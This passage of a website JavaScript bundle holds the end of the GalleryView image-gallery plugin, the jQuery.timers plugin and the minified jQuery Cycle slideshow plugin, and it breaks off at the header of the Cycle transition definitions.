			//Add wrapper to filmstrip to hide extra frames
			j_filmstrip.wrap('<div class="strip_wrapper"></div>');
			if(slide_method=='strip') {
				j_frames.clone().appendTo(j_filmstrip);
				j_frames.clone().appendTo(j_filmstrip);
				j_frames = $('li',j_filmstrip);
			}
			//If captions are enabled, add caption divs and fill with the image titles
			if(opts.show_captions) {
				j_frames.append('<div class="caption"></div>').each(function(i){
					$(this).find('.caption').html($(this).find('img').attr('title'));			   
				});
			}
			
			j_filmstrip.css({
				'listStyle':'none',
				'margin':'0',
				'padding':'0',
				'width':strip_width+'px',
				'position':'absolute',
				'zIndex':'900',
				'top':'0',
				'left':'0',
				'height':(opts.frame_height+10)+'px',
				'background':opts.background_color
			});
			j_frames.css({
				'float':'left',
				'position':'relative',
				'height':opts.frame_height+'px',
				'zIndex':'901',
				'marginTop':frame_margin_top+'px',
				'marginBottom':'0px',
				'marginRight':frame_margin+'px',
				'padding':'0',
				'cursor':'pointer'
			});
			$('img',j_frames).css({
				'border':'none'
			});
			$('.strip_wrapper',j_gallery).css({
				'position':'absolute',
				'top':(opts.filmstrip_position=='top'?'0px':opts.panel_height+'px'),
				'left':((gallery_width-wrapper_width)/2)+'px',
				'width':wrapper_width+'px',
				'height':(opts.frame_height+frame_margin_top+(opts.show_captions?frame_caption_size:frame_margin_top))+'px',
				'overflow':'hidden'
			});
			$('.caption',j_gallery).css({
				'position':'absolute',
				'top':opts.frame_height+'px',
				'left':'0',
				'margin':'0',
				'width':opts.frame_width+'px',
				'padding':'0',
				'color':opts.caption_text_color,
				'textAlign':'center',
				'fontSize':'10px',
				'height':frame_caption_size+'px',
				
				'lineHeight':frame_caption_size+'px'
			});
			var pointer = $('<div></div>');
			pointer.attr('id','pointer').appendTo(j_gallery).css({
				 'position':'absolute',
				 'zIndex':'1000',
				 'cursor':'pointer',
				 'top':getPos(j_frames[0]).top-(pointer_width/2)+'px',
				 'left':getPos(j_frames[0]).left-(pointer_width/2)+'px',
				 'height':opts.frame_height-pointer_width+'px',
				 'width':opts.frame_width-pointer_width+'px',
				 'border':(has_panels?pointer_width+'px solid '+(opts.nav_theme=='dark'?'black':'white'):'none')
			});
			j_pointer = $('#pointer',j_gallery);
			if(has_panels) {
				var pointerArrow = $('<img />');
				pointerArrow.attr('src',img_path+opts.nav_theme+'/pointer'+(opts.filmstrip_position=='top'?'-down':'')+'.png').appendTo($('#pointer')).css({
					'position':'absolute',
					'zIndex':'1001',
					'top':(opts.filmstrip_position=='bottom'?'-'+(10+pointer_width)+'px':opts.frame_height+'px'),
					'left':((opts.frame_width/2)-10)+'px'
				});
			}
			
			//If the filmstrip is animating, move the strip to the middle third
			if(slide_method=='strip') {
				j_filmstrip.css('left','-'+((opts.frame_width+frame_margin)*item_count)+'px');
				iterator = item_count;
			}
			//If there's a link under the pointer, enable clicking on the pointer
			if($('a',j_frames[iterator])[0]) {
				j_pointer.click(function(){
					var a = $('a',j_frames[iterator]).eq(0);
					if(a.attr('target')=='_blank') {window.open(a.attr('href'));}
					else {location.href = a.attr('href');}
				});
			}
			
			//Add navigation buttons
			$('<img />').addClass('nav-next').attr('src',img_path+opts.nav_theme+'/next.png').appendTo(j_gallery).css({
				'position':'absolute',
				'cursor':'pointer',
				'top':(opts.filmstrip_position=='top'?0:opts.panel_height)+frame_margin_top+((opts.frame_height-22)/2)+'px',
				'right':(gallery_width/2)-(wrapper_width/2)-10-22+'px'
			}).click(showNextItem);
			$('<img />').addClass('nav-prev').attr('src',img_path+opts.nav_theme+'/prev.png').appendTo(j_gallery).css({
				'position':'absolute',
				'cursor':'pointer',
				'top':(opts.filmstrip_position=='top'?0:opts.panel_height)+frame_margin_top+((opts.frame_height-22)/2)+'px',
				'left':(gallery_width/2)-(wrapper_width/2)-10-22+'px'
			}).click(showPrevItem);
		};
		
		//Check mouse to see if it is within the borders of the panel
		//More reliable than 'mouseover' event when elements overlay the panel
		function mouseIsOverPanels(x,y) {		
			var pos = getPos(j_gallery[0]);
			var top = pos.top;
			var left = pos.left;
			return x > left && x < left+opts.panel_width && y > top && y < top+opts.panel_height;				
		};
		
/************************************************/
/*	Main Plugin Code							*/
/************************************************/
		return this.each(function() {
			j_gallery = $(this);
			//Determine path between current page and filmstrip images
			//Scan script tags and look for path to GalleryView plugin
			$('script').each(function(i){
				var s = $(this);
				img_path = 'fileadmin/classic/javascript/themes/';
				if(s.attr('src') && s.attr('src').match(/jquery\.galleryview/)){
					img_path = s.attr('src').split('jquery.galleryview')[0]+'themes/';	
				}
			});
			
			//Hide gallery to prevent Flash of Unstyled Content (FoUC) in IE
			j_gallery.css('visibility','hidden');
			
			//Assign elements to variables for reuse
			j_filmstrip = $('.filmstrip',j_gallery);
			j_frames = $('li',j_filmstrip);
			j_panels = $('.panel',j_gallery);
			
			id = j_gallery.attr('id');
			
			has_panels = j_panels.length > 0;
			has_filmstrip = j_frames.length > 0;
			
			if(!has_panels) opts.panel_height = 0;
			
			//Number of frames in filmstrip
			item_count = has_panels?j_panels.length:j_frames.length;
			
			//Number of frames that can display within the screen's width
			//64 = width of block for navigation button * 2
			//5 = minimum frame margin
			strip_size = has_panels?Math.floor((opts.panel_width-64)/(opts.frame_width+frame_margin)):Math.min(item_count,opts.filmstrip_size); 
			
			
			/************************************************/
			/*	Determine transition method for filmstrip	*/
			/************************************************/
					//If more items than strip size, slide filmstrip
					//Otherwise, slide pointer
					if(strip_size >= item_count) {
						slide_method = 'pointer';
						strip_size = item_count;
					}
					else {slide_method = 'strip';}
			
			/************************************************/
			/*	Determine dimensions of various elements	*/
			/************************************************/
					
					//Width of gallery block
					gallery_width = has_panels?opts.panel_width:(strip_size*(opts.frame_width+frame_margin))-frame_margin+64;
					
					//Height of gallery block = screen + filmstrip + captions (optional)
					gallery_height = (has_panels?opts.panel_height:0)+(has_filmstrip?opts.frame_height+frame_margin_top+(opts.show_captions?frame_caption_size:frame_margin_top):0);
					
					//Width of filmstrip
					if(slide_method == 'pointer') {strip_width = (opts.frame_width*item_count)+(frame_margin*(item_count));}
					else {strip_width = (opts.frame_width*item_count*3)+(frame_margin*(item_count*3));}
					
					//Width of filmstrip wrapper (to hide overflow)
					wrapper_width = ((strip_size*opts.frame_width)+((strip_size-1)*frame_margin));
			
			/************************************************/
			/*	Apply CSS Styles							*/
			/************************************************/
					j_gallery.css({
						'position':'relative',
						'margin':'0',
						'background':opts.background_color,
						'border':opts.border,
						'width':gallery_width+'px',
						'height':gallery_height+'px'
					});
			
			/************************************************/
			/*	Build filmstrip and/or panels				*/
			/************************************************/
					if(has_filmstrip) {
						buildFilmstrip();
					}
					if(has_panels) {
						buildPanels();
					}

			
			/************************************************/
			/*	Add events to various elements				*/
			/************************************************/
					if(has_filmstrip) enableFrameClicking();
					
						
						
						$().mousemove(function(e){							
							if(mouseIsOverPanels(e.pageX,e.pageY)) {
								if(opts.pause_on_hover) {
									$(document).oneTime(500,"animation_pause",function(){
										$(document).stopTime("transition");
										paused=true;
									});
								}
								if(has_panels && !has_filmstrip) {
									$('.nav-overlay').fadeIn('fast');
									$('.nav-next').fadeIn('fast');
									$('.nav-prev').fadeIn('fast');
								}
							} else {
								if(opts.pause_on_hover) {
									$(document).stopTime("animation_pause");
									if(paused) {
										$(document).everyTime(opts.transition_interval,"transition",function(){
											showNextItem();
										});
										paused = false;
									}
								}
								if(has_panels && !has_filmstrip) {
									$('.nav-overlay').fadeOut('fast');
									$('.nav-next').fadeOut('fast');
									$('.nav-prev').fadeOut('fast');
								}
							}
						});
			
			
			/************************************************/
			/*	Initiate Automated Animation				*/
			/************************************************/
					//Show the first panel
					j_panels.eq(0).show();

					//If we have more than one item, begin automated transitions
					if(item_count > 1) {
						$(document).everyTime(opts.transition_interval,"transition",function(){
							showNextItem();
						});
					}
					
					//Make gallery visible now that work is complete
					j_gallery.css('visibility','visible');
		});
	};
	
	$.fn.galleryView.defaults = {
		panel_width: 400,
		panel_height: 300,
		frame_width: 80,
		frame_height: 80,
		filmstrip_size: 3,
		overlay_height: 70,
		overlay_font_size: '1em',
		transition_speed: 400,
		transition_interval: 6000,
		overlay_opacity: 0.6,
		overlay_color: 'black',
		background_color: 'black',
		overlay_text_color: 'white',
		caption_text_color: 'white',
		border: '1px solid black',
		nav_theme: 'light',
		easing: 'swing',
		filmstrip_position: 'bottom',
		overlay_position: 'bottom',
		show_captions: false,
		fade_panels: true,
		pause_on_hover: false
	};
})(jQuery);


/**
 * jQuery.timers - Timer abstractions for jQuery
 * Written by Blair Mitchelmore (blair DOT mitchelmore AT gmail DOT com)
 * Licensed under the WTFPL (http://sam.zoy.org/wtfpl/).
 * Date: 2009/02/08
 *
 * @author Blair Mitchelmore
 * @version 1.1.2
 *
 **/

jQuery.fn.extend({
	everyTime: function(interval, label, fn, times, belay) {
		return this.each(function() {
			jQuery.timer.add(this, interval, label, fn, times, belay);
		});
	},
	oneTime: function(interval, label, fn) {
		return this.each(function() {
			jQuery.timer.add(this, interval, label, fn, 1);
		});
	},
	stopTime: function(label, fn) {
		return this.each(function() {
			jQuery.timer.remove(this, label, fn);
		});
	}
});

jQuery.event.special

jQuery.extend({
	timer: {
		global: [],
		guid: 1,
		dataKey: "jQuery.timer",
		regex: /^([0-9]+(?:\.[0-9]*)?)\s*(.*s)?$/,
		powers: {
			// Yeah this is major overkill...
			'ms': 1,
			'cs': 10,
			'ds': 100,
			's': 1000,
			'das': 10000,
			'hs': 100000,
			'ks': 1000000
		},
		timeParse: function(value) {
			if (value == undefined || value == null)
				return null;
			var result = this.regex.exec(jQuery.trim(value.toString()));
			if (result[2]) {
				var num = parseFloat(result[1]);
				var mult = this.powers[result[2]] || 1;
				return num * mult;
			} else {
				return value;
			}
		},
		add: function(element, interval, label, fn, times, belay) {
			var counter = 0;
			
			if (jQuery.isFunction(label)) {
				if (!times) 
					times = fn;
				fn = label;
				label = interval;
			}
			
			interval = jQuery.timer.timeParse(interval);

			if (typeof interval != 'number' || isNaN(interval) || interval <= 0)
				return;

			if (times && times.constructor != Number) {
				belay = !!times;
				times = 0;
			}
			
			times = times || 0;
			belay = belay || false;
			
			var timers = jQuery.data(element, this.dataKey) || jQuery.data(element, this.dataKey, {});
			
			if (!timers[label])
				timers[label] = {};
			
			fn.timerID = fn.timerID || this.guid++;
			
			var handler = function() {
				if (belay && this.inProgress) 
					return;
				this.inProgress = true;
				if ((++counter > times && times !== 0) || fn.call(element, counter) === false)
					jQuery.timer.remove(element, label, fn);
				this.inProgress = false;
			};
			
			handler.timerID = fn.timerID;
			
			if (!timers[label][fn.timerID])
				timers[label][fn.timerID] = window.setInterval(handler,interval);
			
			this.global.push( element );
			
		},
		remove: function(element, label, fn) {
			var timers = jQuery.data(element, this.dataKey), ret;
			
			if ( timers ) {
				
				if (!label) {
					for ( label in timers )
						this.remove(element, label, fn);
				} else if ( timers[label] ) {
					if ( fn ) {
						if ( fn.timerID ) {
							window.clearInterval(timers[label][fn.timerID]);
							delete timers[label][fn.timerID];
						}
					} else {
						for ( var fn in timers[label] ) {
							window.clearInterval(timers[label][fn]);
							delete timers[label][fn];
						}
					}
					
					for ( ret in timers[label] ) break;
					if ( !ret ) {
						ret = null;
						delete timers[label];
					}
				}
				
				for ( ret in timers ) break;
				if ( !ret ) 
					jQuery.removeData(element, this.dataKey);
			}
		}
	}
});

jQuery(window).bind("unload", function() {
	jQuery.each(jQuery.timer.global, function(index, item) {
		jQuery.timer.remove(item);
	});
});


/*
 * jQuery Cycle Plugin (with Transition Definitions)
 * Examples and documentation at: http://jquery.malsup.com/cycle/
 * Copyright (c) 2007-2009 M. Alsup
 * Version: 2.74 (03-FEB-2010)
 * Dual licensed under the MIT and GPL licenses:
 * http://www.opensource.org/licenses/mit-license.php
 * http://www.gnu.org/licenses/gpl.html
 * Requires: jQuery v1.2.6 or later
 */
(function($){var ver="2.74";if($.support==undefined){$.support={opacity:!($.browser.msie)};}function debug(s){if($.fn.cycle.debug){log(s);}}function log(){if(window.console&&window.console.log){window.console.log("[cycle] "+Array.prototype.join.call(arguments," "));}}$.fn.cycle=function(options,arg2){var o={s:this.selector,c:this.context};if(this.length===0&&options!="stop"){if(!$.isReady&&o.s){log("DOM not ready, queuing slideshow");$(function(){$(o.s,o.c).cycle(options,arg2);});return this;}log("terminating; zero elements found by selector"+($.isReady?"":" (DOM not ready)"));return this;}return this.each(function(){var opts=handleArguments(this,options,arg2);if(opts===false){return;}if(this.cycleTimeout){clearTimeout(this.cycleTimeout);}this.cycleTimeout=this.cyclePause=0;var $cont=$(this);var $slides=opts.slideExpr?$(opts.slideExpr,this):$cont.children();var els=$slides.get();if(els.length<2){log("terminating; too few slides: "+els.length);return;}var opts2=buildOptions($cont,$slides,els,opts,o);if(opts2===false){return;}var startTime=opts2.continuous?10:getTimeout(opts2.currSlide,opts2.nextSlide,opts2,!opts2.rev);if(startTime){startTime+=(opts2.delay||0);if(startTime<10){startTime=10;}debug("first timeout: "+startTime);this.cycleTimeout=setTimeout(function(){go(els,opts2,0,!opts2.rev);},startTime);}});};function handleArguments(cont,options,arg2){if(cont.cycleStop==undefined){cont.cycleStop=0;}if(options===undefined||options===null){options={};}if(options.constructor==String){switch(options){case"stop":cont.cycleStop++;if(cont.cycleTimeout){clearTimeout(cont.cycleTimeout);}cont.cycleTimeout=0;$(cont).removeData("cycle.opts");return false;case"toggle":cont.cyclePause=(cont.cyclePause===1)?0:1;return false;case"pause":cont.cyclePause=1;return false;case"resume":cont.cyclePause=0;if(arg2===true){options=$(cont).data("cycle.opts");if(!options){log("options not found, can not resume");return false;}if(cont.cycleTimeout){clearTimeout(cont.cycleTimeout);cont.cycleTimeout=0;}go(options.elements,options,1,1);}return false;case"prev":case"next":var opts=$(cont).data("cycle.opts");if(!opts){log('options not found, "prev/next" ignored');return false;}$.fn.cycle[options](opts);return false;default:options={fx:options};}return options;}else{if(options.constructor==Number){var num=options;options=$(cont).data("cycle.opts");if(!options){log("options not found, can not advance slide");return false;}if(num<0||num>=options.elements.length){log("invalid slide index: "+num);return false;}options.nextSlide=num;if(cont.cycleTimeout){clearTimeout(cont.cycleTimeout);cont.cycleTimeout=0;}if(typeof arg2=="string"){options.oneTimeFx=arg2;}go(options.elements,options,1,num>=options.currSlide);return false;}}return options;}function removeFilter(el,opts){if(!$.support.opacity&&opts.cleartype&&el.style.filter){try{el.style.removeAttribute("filter");}catch(smother){}}}function buildOptions($cont,$slides,els,options,o){var opts=$.extend({},$.fn.cycle.defaults,options||{},$.metadata?$cont.metadata():$.meta?$cont.data():{});if(opts.autostop){opts.countdown=opts.autostopCount||els.length;}var cont=$cont[0];$cont.data("cycle.opts",opts);opts.$cont=$cont;opts.stopCount=cont.cycleStop;opts.elements=els;opts.before=opts.before?[opts.before]:[];opts.after=opts.after?[opts.after]:[];opts.after.unshift(function(){opts.busy=0;});if(!$.support.opacity&&opts.cleartype){opts.after.push(function(){removeFilter(this,opts);});}if(opts.continuous){opts.after.push(function(){go(els,opts,0,!opts.rev);});}saveOriginalOpts(opts);if(!$.support.opacity&&opts.cleartype&&!opts.cleartypeNoBg){clearTypeFix($slides);}if($cont.css("position")=="static"){$cont.css("position","relative");}if(opts.width){$cont.width(opts.width);}if(opts.height&&opts.height!="auto"){$cont.height(opts.height);}if(opts.startingSlide){opts.startingSlide=parseInt(opts.startingSlide);}if(opts.random){opts.randomMap=[];for(var i=0;i<els.length;i++){opts.randomMap.push(i);}opts.randomMap.sort(function(a,b){return Math.random()-0.5;});opts.randomIndex=0;opts.startingSlide=opts.randomMap[0];}else{if(opts.startingSlide>=els.length){opts.startingSlide=0;}}opts.currSlide=opts.startingSlide=opts.startingSlide||0;var first=opts.startingSlide;$slides.css({position:"absolute",top:0,left:0}).hide().each(function(i){var z=first?i>=first?els.length-(i-first):first-i:els.length-i;$(this).css("z-index",z);});$(els[first]).css("opacity",1).show();removeFilter(els[first],opts);if(opts.fit&&opts.width){$slides.width(opts.width);}if(opts.fit&&opts.height&&opts.height!="auto"){$slides.height(opts.height);}var reshape=opts.containerResize&&!$cont.innerHeight();if(reshape){var maxw=0,maxh=0;for(var j=0;j<els.length;j++){var $e=$(els[j]),e=$e[0],w=$e.outerWidth(),h=$e.outerHeight();if(!w){w=e.offsetWidth;}if(!h){h=e.offsetHeight;}maxw=w>maxw?w:maxw;maxh=h>maxh?h:maxh;}if(maxw>0&&maxh>0){$cont.css({width:maxw+"px",height:maxh+"px"});}}if(opts.pause){$cont.hover(function(){this.cyclePause++;},function(){this.cyclePause--;});}if(supportMultiTransitions(opts)===false){return false;}var requeue=false;options.requeueAttempts=options.requeueAttempts||0;$slides.each(function(){var $el=$(this);this.cycleH=(opts.fit&&opts.height)?opts.height:$el.height();this.cycleW=(opts.fit&&opts.width)?opts.width:$el.width();if($el.is("img")){var loadingIE=($.browser.msie&&this.cycleW==28&&this.cycleH==30&&!this.complete);var loadingFF=($.browser.mozilla&&this.cycleW==34&&this.cycleH==19&&!this.complete);var loadingOp=($.browser.opera&&((this.cycleW==42&&this.cycleH==19)||(this.cycleW==37&&this.cycleH==17))&&!this.complete);var loadingOther=(this.cycleH==0&&this.cycleW==0&&!this.complete);if(loadingIE||loadingFF||loadingOp||loadingOther){if(o.s&&opts.requeueOnImageNotLoaded&&++options.requeueAttempts<100){log(options.requeueAttempts," - img slide not loaded, requeuing slideshow: ",this.src,this.cycleW,this.cycleH);setTimeout(function(){$(o.s,o.c).cycle(options);},opts.requeueTimeout);requeue=true;return false;}else{log("could not determine size of image: "+this.src,this.cycleW,this.cycleH);}}}return true;});if(requeue){return false;}opts.cssBefore=opts.cssBefore||{};opts.animIn=opts.animIn||{};opts.animOut=opts.animOut||{};$slides.not(":eq("+first+")").css(opts.cssBefore);if(opts.cssFirst){$($slides[first]).css(opts.cssFirst);}if(opts.timeout){opts.timeout=parseInt(opts.timeout);if(opts.speed.constructor==String){opts.speed=$.fx.speeds[opts.speed]||parseInt(opts.speed);}if(!opts.sync){opts.speed=opts.speed/2;}while((opts.timeout-opts.speed)<250){opts.timeout+=opts.speed;}}if(opts.easing){opts.easeIn=opts.easeOut=opts.easing;}if(!opts.speedIn){opts.speedIn=opts.speed;}if(!opts.speedOut){opts.speedOut=opts.speed;}opts.slideCount=els.length;opts.currSlide=opts.lastSlide=first;if(opts.random){opts.nextSlide=opts.currSlide;if(++opts.randomIndex==els.length){opts.randomIndex=0;}opts.nextSlide=opts.randomMap[opts.randomIndex];}else{opts.nextSlide=opts.startingSlide>=(els.length-1)?0:opts.startingSlide+1;}if(!opts.multiFx){var init=$.fn.cycle.transitions[opts.fx];if($.isFunction(init)){init($cont,$slides,opts);}else{if(opts.fx!="custom"&&!opts.multiFx){log("unknown transition: "+opts.fx,"; slideshow terminating");return false;}}}var e0=$slides[first];if(opts.before.length){opts.before[0].apply(e0,[e0,e0,opts,true]);}if(opts.after.length>1){opts.after[1].apply(e0,[e0,e0,opts,true]);}if(opts.next){$(opts.next).bind(opts.prevNextEvent,function(){return advance(opts,opts.rev?-1:1);});}if(opts.prev){$(opts.prev).bind(opts.prevNextEvent,function(){return advance(opts,opts.rev?1:-1);});}if(opts.pager){buildPager(els,opts);}exposeAddSlide(opts,els);return opts;}function saveOriginalOpts(opts){opts.original={before:[],after:[]};opts.original.cssBefore=$.extend({},opts.cssBefore);opts.original.cssAfter=$.extend({},opts.cssAfter);opts.original.animIn=$.extend({},opts.animIn);opts.original.animOut=$.extend({},opts.animOut);$.each(opts.before,function(){opts.original.before.push(this);});$.each(opts.after,function(){opts.original.after.push(this);});}function supportMultiTransitions(opts){var i,tx,txs=$.fn.cycle.transitions;if(opts.fx.indexOf(",")>0){opts.multiFx=true;opts.fxs=opts.fx.replace(/\s*/g,"").split(",");for(i=0;i<opts.fxs.length;i++){var fx=opts.fxs[i];tx=txs[fx];if(!tx||!txs.hasOwnProperty(fx)||!$.isFunction(tx)){log("discarding unknown transition: ",fx);opts.fxs.splice(i,1);i--;}}if(!opts.fxs.length){log("No valid transitions named; slideshow terminating.");return false;}}else{if(opts.fx=="all"){opts.multiFx=true;opts.fxs=[];for(p in txs){tx=txs[p];if(txs.hasOwnProperty(p)&&$.isFunction(tx)){opts.fxs.push(p);}}}}if(opts.multiFx&&opts.randomizeEffects){var r1=Math.floor(Math.random()*20)+30;for(i=0;i<r1;i++){var r2=Math.floor(Math.random()*opts.fxs.length);opts.fxs.push(opts.fxs.splice(r2,1)[0]);}debug("randomized fx sequence: ",opts.fxs);}return true;}function exposeAddSlide(opts,els){opts.addSlide=function(newSlide,prepend){var $s=$(newSlide),s=$s[0];if(!opts.autostopCount){opts.countdown++;}els[prepend?"unshift":"push"](s);if(opts.els){opts.els[prepend?"unshift":"push"](s);}opts.slideCount=els.length;$s.css("position","absolute");$s[prepend?"prependTo":"appendTo"](opts.$cont);if(prepend){opts.currSlide++;opts.nextSlide++;}if(!$.support.opacity&&opts.cleartype&&!opts.cleartypeNoBg){clearTypeFix($s);}if(opts.fit&&opts.width){$s.width(opts.width);}if(opts.fit&&opts.height&&opts.height!="auto"){$slides.height(opts.height);}s.cycleH=(opts.fit&&opts.height)?opts.height:$s.height();s.cycleW=(opts.fit&&opts.width)?opts.width:$s.width();$s.css(opts.cssBefore);if(opts.pager){$.fn.cycle.createPagerAnchor(els.length-1,s,$(opts.pager),els,opts);}if($.isFunction(opts.onAddSlide)){opts.onAddSlide($s);}else{$s.hide();}};}$.fn.cycle.resetState=function(opts,fx){fx=fx||opts.fx;opts.before=[];opts.after=[];opts.cssBefore=$.extend({},opts.original.cssBefore);opts.cssAfter=$.extend({},opts.original.cssAfter);opts.animIn=$.extend({},opts.original.animIn);opts.animOut=$.extend({},opts.original.animOut);opts.fxFn=null;$.each(opts.original.before,function(){opts.before.push(this);});$.each(opts.original.after,function(){opts.after.push(this);});var init=$.fn.cycle.transitions[fx];if($.isFunction(init)){init(opts.$cont,$(opts.elements),opts);}};function go(els,opts,manual,fwd){if(manual&&opts.busy&&opts.manualTrump){$(els).stop(true,true);opts.busy=false;}if(opts.busy){return;}var p=opts.$cont[0],curr=els[opts.currSlide],next=els[opts.nextSlide];if(p.cycleStop!=opts.stopCount||p.cycleTimeout===0&&!manual){return;}if(!manual&&!p.cyclePause&&((opts.autostop&&(--opts.countdown<=0))||(opts.nowrap&&!opts.random&&opts.nextSlide<opts.currSlide))){if(opts.end){opts.end(opts);}return;}if(manual||!p.cyclePause){var fx=opts.fx;curr.cycleH=curr.cycleH||$(curr).height();curr.cycleW=curr.cycleW||$(curr).width();next.cycleH=next.cycleH||$(next).height();next.cycleW=next.cycleW||$(next).width();if(opts.multiFx){if(opts.lastFx==undefined||++opts.lastFx>=opts.fxs.length){opts.lastFx=0;}fx=opts.fxs[opts.lastFx];opts.currFx=fx;}if(opts.oneTimeFx){fx=opts.oneTimeFx;opts.oneTimeFx=null;}$.fn.cycle.resetState(opts,fx);if(opts.before.length){$.each(opts.before,function(i,o){if(p.cycleStop!=opts.stopCount){return;}o.apply(next,[curr,next,opts,fwd]);});}var after=function(){$.each(opts.after,function(i,o){if(p.cycleStop!=opts.stopCount){return;}o.apply(next,[curr,next,opts,fwd]);});};if(opts.nextSlide!=opts.currSlide){opts.busy=1;if(opts.fxFn){opts.fxFn(curr,next,opts,after,fwd);}else{if($.isFunction($.fn.cycle[opts.fx])){$.fn.cycle[opts.fx](curr,next,opts,after);}else{$.fn.cycle.custom(curr,next,opts,after,manual&&opts.fastOnEvent);}}}opts.lastSlide=opts.currSlide;if(opts.random){opts.currSlide=opts.nextSlide;if(++opts.randomIndex==els.length){opts.randomIndex=0;}opts.nextSlide=opts.randomMap[opts.randomIndex];}else{var roll=(opts.nextSlide+1)==els.length;opts.nextSlide=roll?0:opts.nextSlide+1;opts.currSlide=roll?els.length-1:opts.nextSlide-1;}if(opts.pager){$.fn.cycle.updateActivePagerLink(opts.pager,opts.currSlide);}}var ms=0;if(opts.timeout&&!opts.continuous){ms=getTimeout(curr,next,opts,fwd);}else{if(opts.continuous&&p.cyclePause){ms=10;}}if(ms>0){p.cycleTimeout=setTimeout(function(){go(els,opts,0,!opts.rev);},ms);}}$.fn.cycle.updateActivePagerLink=function(pager,currSlide){$(pager).each(function(){$(this).find("a").removeClass("activeSlide").filter("a:eq("+currSlide+")").addClass("activeSlide");});};function getTimeout(curr,next,opts,fwd){if(opts.timeoutFn){var t=opts.timeoutFn(curr,next,opts,fwd);while((t-opts.speed)<250){t+=opts.speed;}debug("calculated timeout: "+t+"; speed: "+opts.speed);if(t!==false){return t;}}return opts.timeout;}$.fn.cycle.next=function(opts){advance(opts,opts.rev?-1:1);};$.fn.cycle.prev=function(opts){advance(opts,opts.rev?1:-1);};function advance(opts,val){var els=opts.elements;var p=opts.$cont[0],timeout=p.cycleTimeout;if(timeout){clearTimeout(timeout);p.cycleTimeout=0;}if(opts.random&&val<0){opts.randomIndex--;if(--opts.randomIndex==-2){opts.randomIndex=els.length-2;}else{if(opts.randomIndex==-1){opts.randomIndex=els.length-1;}}opts.nextSlide=opts.randomMap[opts.randomIndex];}else{if(opts.random){if(++opts.randomIndex==els.length){opts.randomIndex=0;}opts.nextSlide=opts.randomMap[opts.randomIndex];}else{opts.nextSlide=opts.currSlide+val;if(opts.nextSlide<0){if(opts.nowrap){return false;}opts.nextSlide=els.length-1;}else{if(opts.nextSlide>=els.length){if(opts.nowrap){return false;}opts.nextSlide=0;}}}}if($.isFunction(opts.prevNextClick)){opts.prevNextClick(val>0,opts.nextSlide,els[opts.nextSlide]);}go(els,opts,1,val>=0);return false;}function buildPager(els,opts){var $p=$(opts.pager);$.each(els,function(i,o){$.fn.cycle.createPagerAnchor(i,o,$p,els,opts);});$.fn.cycle.updateActivePagerLink(opts.pager,opts.startingSlide);}$.fn.cycle.createPagerAnchor=function(i,el,$p,els,opts){var a;if($.isFunction(opts.pagerAnchorBuilder)){a=opts.pagerAnchorBuilder(i,el);}else{a='<a href="#">'+(i+1)+"</a>";}if(!a){return;}var $a=$(a);if($a.parents("body").length===0){var arr=[];if($p.length>1){$p.each(function(){var $clone=$a.clone(true);$(this).append($clone);arr.push($clone[0]);});$a=$(arr);}else{$a.appendTo($p);}}$a.bind(opts.pagerEvent,function(e){e.preventDefault();opts.nextSlide=i;var p=opts.$cont[0],timeout=p.cycleTimeout;if(timeout){clearTimeout(timeout);p.cycleTimeout=0;}if($.isFunction(opts.pagerClick)){opts.pagerClick(opts.nextSlide,els[opts.nextSlide]);}go(els,opts,1,opts.currSlide<i);return false;});if(opts.pagerEvent!="click"){$a.click(function(){return false;});}if(opts.pauseOnPagerHover){$a.hover(function(){opts.$cont[0].cyclePause++;},function(){opts.$cont[0].cyclePause--;});}};$.fn.cycle.hopsFromLast=function(opts,fwd){var hops,l=opts.lastSlide,c=opts.currSlide;if(fwd){hops=c>l?c-l:opts.slideCount-l;}else{hops=c<l?l-c:l+opts.slideCount-c;}return hops;};function clearTypeFix($slides){function hex(s){s=parseInt(s).toString(16);return s.length<2?"0"+s:s;}function getBg(e){for(;e&&e.nodeName.toLowerCase()!="html";e=e.parentNode){var v=$.css(e,"background-color");if(v.indexOf("rgb")>=0){var rgb=v.match(/\d+/g);return"#"+hex(rgb[0])+hex(rgb[1])+hex(rgb[2]);}if(v&&v!="transparent"){return v;}}return"#ffffff";}$slides.each(function(){$(this).css("background-color",getBg(this));});}$.fn.cycle.commonReset=function(curr,next,opts,w,h,rev){$(opts.elements).not(curr).hide();opts.cssBefore.opacity=1;opts.cssBefore.display="block";if(w!==false&&next.cycleW>0){opts.cssBefore.width=next.cycleW;}if(h!==false&&next.cycleH>0){opts.cssBefore.height=next.cycleH;}opts.cssAfter=opts.cssAfter||{};opts.cssAfter.display="none";$(curr).css("zIndex",opts.slideCount+(rev===true?1:0));$(next).css("zIndex",opts.slideCount+(rev===true?0:1));};$.fn.cycle.custom=function(curr,next,opts,cb,speedOverride){var $l=$(curr),$n=$(next);var speedIn=opts.speedIn,speedOut=opts.speedOut,easeIn=opts.easeIn,easeOut=opts.easeOut;$n.css(opts.cssBefore);if(speedOverride){if(typeof speedOverride=="number"){speedIn=speedOut=speedOverride;}else{speedIn=speedOut=1;}easeIn=easeOut=null;}var fn=function(){$n.animate(opts.animIn,speedIn,easeIn,cb);};$l.animate(opts.animOut,speedOut,easeOut,function(){if(opts.cssAfter){$l.css(opts.cssAfter);}if(!opts.sync){fn();}});if(opts.sync){fn();}};$.fn.cycle.transitions={fade:function($cont,$slides,opts){$slides.not(":eq("+opts.currSlide+")").css("opacity",0);opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts);opts.cssBefore.opacity=0;});opts.animIn={opacity:1};opts.animOut={opacity:0};opts.cssBefore={top:0,left:0};}};$.fn.cycle.ver=function(){return ver;};$.fn.cycle.defaults={fx:"fade",timeout:4000,timeoutFn:null,continuous:0,speed:1000,speedIn:null,speedOut:null,next:null,prev:null,prevNextClick:null,prevNextEvent:"click",pager:null,pagerClick:null,pagerEvent:"click",pagerAnchorBuilder:null,before:null,after:null,end:null,easing:null,easeIn:null,easeOut:null,shuffle:null,animIn:null,animOut:null,cssBefore:null,cssAfter:null,fxFn:null,height:"auto",startingSlide:0,sync:1,random:0,fit:0,containerResize:1,pause:0,pauseOnPagerHover:0,autostop:0,autostopCount:0,delay:0,slideExpr:null,cleartype:!$.support.opacity,cleartypeNoBg:false,nowrap:0,fastOnEvent:0,randomizeEffects:1,rev:0,manualTrump:true,requeueOnImageNotLoaded:true,requeueTimeout:250};})(jQuery);
/*
 * jQuery Cycle Plugin Transition Definitions
 * This script is a plugin for the jQuery Cycle Plugin
 * Examples and documentation at: http://malsup.com/jquery/cycle/
 * Copyright (c) 2007-2008 M. Alsup
 * Version:	 2.72
